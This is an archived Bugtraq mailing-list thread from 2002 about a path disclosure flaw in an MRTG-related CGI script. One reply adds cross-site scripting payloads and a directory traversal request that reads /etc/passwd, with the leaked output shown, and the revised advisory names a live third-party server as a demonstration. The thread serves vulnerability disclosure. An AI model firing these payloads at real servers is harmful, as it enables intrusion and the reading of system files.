7943813 2002-02-04 02:18 +0200 /68 rader/ Tamer Sahin <ts@securityoffice.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-02-04 18:04 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: ts@securityoffice.net
Mottagare: Bugtraq (import) <20785>
Ärende: Mrtg Path Disclosure Vulnerability
------------------------------------------------------------
From: "Tamer Sahin" <ts@securityoffice.net>
To: <bugtraq@securityfocus.com>
Message-ID: <000e01c1ad11$8849c5f0$d5fb83d9@ts>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Mrtg Path Disclosure Vulnerability
Type:
Input Validation Error
Release Date:
February 4, 2002
Product / Vendor:
The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the
traffic load on network-links. Mrtg generates html pages containing
gif images which provide a live visual representation of this
traffic.
http://www.mrtg.org
Summary:
If an attacker submits a web request containing unexpected arguments
for script variables, an error message will be displayed containing
the path to the webroot directory of the server running the Mrtg cgi
script.
http://host/mrtg.cgi?cfg=blabla
Tested:
Mrtg v2.090011
Mrtg v2.090006
Vulnerable:
Mrtg v2.090011
Mrtg v2.090006
And may be other.
Disclaimer:
http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on
this security advisory.
Author:
Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net
Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0 Fingerprint:
B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPF3TbLuLpFMrXtywEQIU5QCghYmngYvhwveU+8W3JwTz5QtsmU0AoJZD
Tbl6HDhKVnFPEy1DSB3/q3AH
=+kUc
-----END PGP SIGNATURE-----
(7943813) /Tamer Sahin <ts@securityoffice.net>/-----
Kommentar i text 7944923 av Barney Wolff <barney@databus.com>
7945975 2002-02-04 10:56 -0700 /63 rader/ Dave Ahmad <da@securityfocus.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-02-04 21:46 av Brevbäraren
Extern mottagare: Barney Wolff <barney@databus.com>
Extern kopiemottagare: Tamer Sahin <ts@securityoffice.net>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20794>
Kommentar till text 7944923 av Barney Wolff <barney@databus.com>
Ärende: Re: Mrtg Path Disclosure Vulnerability
------------------------------------------------------------
From: Dave Ahmad <da@securityfocus.com>
To: Barney Wolff <barney@databus.com>
Cc: Tamer Sahin <ts@securityoffice.net>, <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.43.0202041050560.18483-100000@mail.securityfocus.com>
Barney,
You're correct.. 'mrtg.cgi' is not part of MRTG. It's from a
completely indepedent utility called 'mrtgconfig'. The project
homepage is:
http://mrtgconfig.sourceforge.net/
The path disclosure issue (version 0.5.9):
[dma@victim mrtgconfig]$ /home/dma/mtrg/mrtgconfig/mrtg.cgi
(offline mode: enter name=value pairs on standard input)
cfg
Content-type: text/html
<H1>Software error:</H1>
<CODE>Can't open configuration file for mrtgconfig: No such file or
directory at /home/dma/mrtg/mrtgconfig/mrtg.cgi line 46,
<STDIN> chunk 1.
</CODE>
<P>
For help, please send mail to this site's webmaster, giving this error
message and the time and date of the error.
Dave Ahmad
SecurityFocus
www.securityfocus.com
On Mon, 4 Feb 2002, Barney Wolff wrote:
> Unless I'm terribly confused, mrtg only generates files and runs off
> cron, not as a cgi. So you're dealing with something other than mrtg
> itself. Also, the current version is 2.9.18pre1.
>
> Barney Wolff
>
> On Mon, Feb 04, 2002 at 02:18:54AM +0200, Tamer Sahin wrote:
> >
> > Summary:
> > If an attacker submits a web request containing unexpected arguments
> > for script variables, an error message will be displayed containing
> > the path to the webroot directory of the server running the Mrtg cgi
> > script.
> >
> > http://host/mrtg.cgi?cfg=blabla
> >
> > Tested:
> > Mrtg v2.090011
> > Mrtg v2.090006
> >
> > Vulnerable:
> > Mrtg v2.090011
> > Mrtg v2.090006
> >
> > And may be other.
>
(7945975) /Dave Ahmad <da@securityfocus.com>/(Ombruten)
7946902 2002-02-04 21:09 +0100 /92 rader/ Frog Man <leseulfrog@hotmail.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-02-04 23:34 av Brevbäraren
Extern mottagare: ts@securityoffice.net
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20800>
Ärende: Re: Mrtg Path Disclosure Vulnerability
------------------------------------------------------------
From: "Frog Man" <leseulfrog@hotmail.com>
To: ts@securityoffice.net
Cc: bugtraq@securityfocus.com
Message-ID: <F92E6l7GWzG7JEKVb5N000165f6@hotmail.com>
/mrtg.cgi?log=<script>alert('CSS')</script>
/mrtg.cgi?log=<script>alert('Cross Site Scripting')</script>
/mrtg.cgi?cfg=../../etc/passwd :
------------------- mrtg.cgi error ------------------------
Software error: ERROR: CFG Error Unknown Option
"root:PASS:0:0:root:/root" on line 2 or above. Check
doc/reference.txt for Help
------------------- mrtg.cgi error ------------------------
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>Mrtg Path Disclosure Vulnerability
>
>Type:
>Input Validation Error
>
>Release Date:
>February 4, 2002
>
>Product / Vendor:
>The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the
>traffic load on network-links. Mrtg generates html pages containing
>gif images which provide a live visual representation of this
>traffic.
>
>http://www.mrtg.org
>
>Summary:
>If an attacker submits a web request containing unexpected arguments
>for script variables, an error message will be displayed containing
>the path to the webroot directory of the server running the Mrtg cgi
>script.
>
>http://host/mrtg.cgi?cfg=blabla
>
>Tested:
>Mrtg v2.090011
>Mrtg v2.090006
>
>Vulnerable:
>Mrtg v2.090011
>Mrtg v2.090006
>
>And may be other.
>
>Disclaimer:
>http://www.securityoffice.net is not responsible for the misuse or
>illegal use of any of the information and/or the software listed on
>this security advisory.
>
>Author:
>Tamer Sahin
>ts@securityoffice.net
>http://www.securityoffice.net
>
>Tamer Sahin
>http://www.securityoffice.net
>PGP Key ID: 0x2B5EDCB0 Fingerprint:
>B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGP 7.1
>
>iQA/AwUBPF3TbLuLpFMrXtywEQIU5QCghYmngYvhwveU+8W3JwTz5QtsmU0AoJZD
>Tbl6HDhKVnFPEy1DSB3/q3AH
>=+kUc
>-----END PGP SIGNATURE-----
>
>
>
>
_________________________________________________________________
Téléchargez MSN Explorer gratuitement à l'adresse
http://explorer.msn.fr/intl.asp.
(7946902) /Frog Man <leseulfrog@hotmail.com>/(Ombruten)
7953529 2002-02-06 00:30 +0200 /69 rader/ Tamer Sahin <ts@securityoffice.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-02-05 23:49 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: michael@michaelearls.com
Externa svar till: ts@securityoffice.net
Mottagare: Bugtraq (import) <20837>
Ärende: Mrtg Path Disclosure Vulnerability (Revised)
------------------------------------------------------------
From: "Tamer Sahin" <ts@securityoffice.net>
To: <bugtraq@securityfocus.com>
Cc: <michael@michaelearls.com>
Message-ID: <00ae01c1ae94$b2102580$718f83d9@ts>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
*/This is Mrtg Web Frontend 14all.cgi bug. You may find the revised
security announcement below/*
Mrtg/RRD 14all.cgi Path Disclosure Vulnerability
Type:
Input Validation Error
Release Date:
February 4, 2002
Product / Vendor:
14all.cgi is a CGI script to create html pages and graphics for Mrtg.
http://people.ee.ethz.ch/~oetiker/webtools/mrtg/mrtg-rrd.html
Summary:
If an attacker submits a web request containing unexpected arguments
for script variables, an error message will be displayed containing
the path to the webroot directory of the server running the Mrtg/RRD
14all.cgi script.
http://host/mrtg.cgi?cfg=blabla
Tested:
Mrtg/RRD 14all.cgi v1.1p15
Vulnerable:
Mrtg/RRD 14all.cgi v1.1p15
And may be other.
Demonstration:
http://barnes.bloomu.edu/cgi-bin/mrtg.cgi?cfg=blabla
Disclaimer:
http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on
this security advisory.
Author:
Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net
Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPGBc+buLpFMrXtywEQJRLACfQ6sMmsTi4fD3PG3p7AFDxmo3XogAnj58
fnyk5QpMwxQQ7WBFTQ/w+fj+
=rxm+
-----END PGP SIGNATURE-----
(7953529) /Tamer Sahin <ts@securityoffice.net>/-----